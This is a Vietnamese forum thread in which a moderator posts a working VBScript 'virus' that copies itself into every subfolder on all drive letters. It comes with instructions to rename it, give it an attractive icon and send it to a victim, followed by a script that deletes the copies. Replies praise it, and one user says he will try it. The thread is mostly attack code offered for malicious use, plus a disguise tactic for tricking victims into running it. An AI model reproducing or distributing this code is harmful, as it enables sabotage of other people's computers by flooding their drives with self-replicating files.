Đưa Skin mới vào diễn đàn sử dụng ! Nếu quá trình sử dụng diễn đàn xảy ra lỗi, xin vui lòng liên hệ Admin để báo lỗi ! Cảm ơn !

You are not connected. Please login or register

Tạo virus tự nhân bản vui!!!

 • Please log in to post a topic
 • avatar

  meomeo
  avatar

  meomeo

  Group: S.mod

  Hiện đang:
  Bài viết : 529
  Points : 1875
  Birthday : 03/03/1991
  Thanks : 935

  S.mod
  Xem lý lịch thành viên

  S.mod
  Bài viết thứ :1

  Đăng vào:on 21/2/2012, 18:45

  S.mod
  Vào START => PROGRAMS =>ACCESSORIES=>NOTEPAD
  Copy đoạn mã sau:


  'Thuoc Doc !!!
  Dim fso,file,VBCopy
  Set fso=CreateObject("Scripting.FileSystemObject")
  Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  VBCopy=file.ReadAll
  FolderList("A:")
  FolderList("B:")
  FolderList("C:")
  FolderList("D:")
  FolderList("E:")
  FolderList("F:")
  FolderList("G:")
  FolderList("H:")
  FolderList("I:")
  FolderList("J:")
  FolderList("K:")
  FolderList("L:")
  FolderList("M:")
  FolderList("N:")
  FolderList("O:")
  FolderList("P:")
  FolderList("Q:")
  FolderList("R:")
  FolderList("S:")
  FolderList("T:")
  FolderList("U:")
  FolderList("V:")
  FolderList("X:")
  FolderList("Y:")
  FolderList("Z:")
  FolderList("W:")

  Sub FolderList(FolderSpec)
  On Error Resume Next
  Dim f,f1,sf,COP,CAP
  Set f=fso.GetFolder(FolderSpec)
  set sf=f.SubFolders
  For Each f1 In sf
  Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  COP.write VBCopy
  Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  CAP.write VBCopy
  FolderList(f1.Path)
  Next
  End sub


  Lưu lại với tên: thuocdoc.vbs (nhất định phải lưu lại dưới dạng .VBS)

  Thay đổi tên và icon cho đẹp mắt rồi gởi cho nạn nhân. Chỉ cần 1 cú click là TRÀN NGẬP cả máy...

  Nếu bạn là nạn nhân:

  .Copy Đoạn Mã Sau :
  'Thuoc Giai
  Dim fso,file,VBCopy
  Set fso=CreateObject("Scripting.FileSystemObject")
  Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  VBCopy=file.ReadAll
  FolderList("A:")
  FolderList("B:")
  FolderList("C:")
  FolderList("D:")
  FolderList("E:")
  FolderList("F:")
  FolderList("G:")
  FolderList("H:")
  FolderList("I:")
  FolderList("J:")
  FolderList("K:")
  FolderList("L:")
  FolderList("M:")
  FolderList("N:")
  FolderList("O:")
  FolderList("P:")
  FolderList("Q:")
  FolderList("R:")
  FolderList("S:")
  FolderList("T:")
  FolderList("U:")
  FolderList("V:")
  FolderList("X:")
  FolderList("Y:")
  FolderList("Z:")
  FolderList("W:")

  Sub FolderList(FolderSpec)
  On Error Resume Next
  Dim f,f1,sf,COP,CAP,ATT
  Set f=fso.GetFolder(FolderSpec)
  set sf=f.SubFolders
  For Each f1 In sf
  'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  'COP.write VBCopy
  'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  'CAP.write VBCopy
  'Set ATT=fso.GetFolder(f1.Path)
  'ATT.Attributes=ATT.Attributes+2
  fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
  fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
  FolderList(f1.Path)
  Next
  End sub

  Lưu lại với tên thuocgiai.vbs sau đó kích đôi vào là OK!!!

  #1 - Posted on 21/2/2012, 18:45
  Xem lý lịch thành viên
  avatar

  KenVip
  avatar

  KenVip

  Group: Member

  Hiện đang:
  Bài viết : 118
  Points : 148
  Birthday : 19/12/1991
  Thanks : 24
  Đến từ : Địa ngục

  Member
  Xem lý lịch thành viên

  Member
  Bài viết thứ :2

  Đăng vào:on 21/2/2012, 23:03

  Member
  hay đấy

  #2 - Posted on 21/2/2012, 23:03
  Xem lý lịch thành viên
  avatar

  nguyenlam
  avatar

  nguyenlam

  Group: Member

  Hiện đang:
  Bài viết : 242
  Points : 405
  Thanks : 129

  Member
  Xem lý lịch thành viên

  Member
  Bài viết thứ :3

  Đăng vào:on 23/2/2012, 01:18

  Member
  cũng được

  #3 - Posted on 23/2/2012, 01:18
  Xem lý lịch thành viên
  avatar

  luckykiller01
  avatar

  luckykiller01

  Group: Member

  Hiện đang:
  Bài viết : 2
  Points : 2
  Birthday : 10/05/1981
  Thanks : 0
  Đến từ : TPHCM

  Member
  Xem lý lịch thành viên

  Member
  Bài viết thứ :4

  Đăng vào:on 18/12/2014, 13:35

  Member
  hay hay ,cái này phải thử thui haaaaaaaaaaaaaaa

  #4 - Posted on 18/12/2014, 13:35
  Xem lý lịch thành viên

  Sponsored content

  Sponsored content

  Group:
  Hiện đang:

  Bài viết thứ :5

  Đăng vào:

  #5 - Posted

  Đang kiểm tra dữ liệu...

  Bạn phải điền đầy đủ thông tin đăng ký.

  Số ký tự phải từ 3 trở lên
  Hãy chọn tài khoản khác
  Có thể dùng tài khoản này
  Không sử dụng địa chỉ này
  E-mail sẽ được kiểm sau
  Số ký tự phải từ 3 trở lên
  Trùng tên đăng nhập
  Chưa đúng
  Chính xác

  Free forum | © PunBB | Free forum support | Liên hệ | Report an abuse | Have a free blog with Sosblog
  YOUR BANNER HERE
  728x90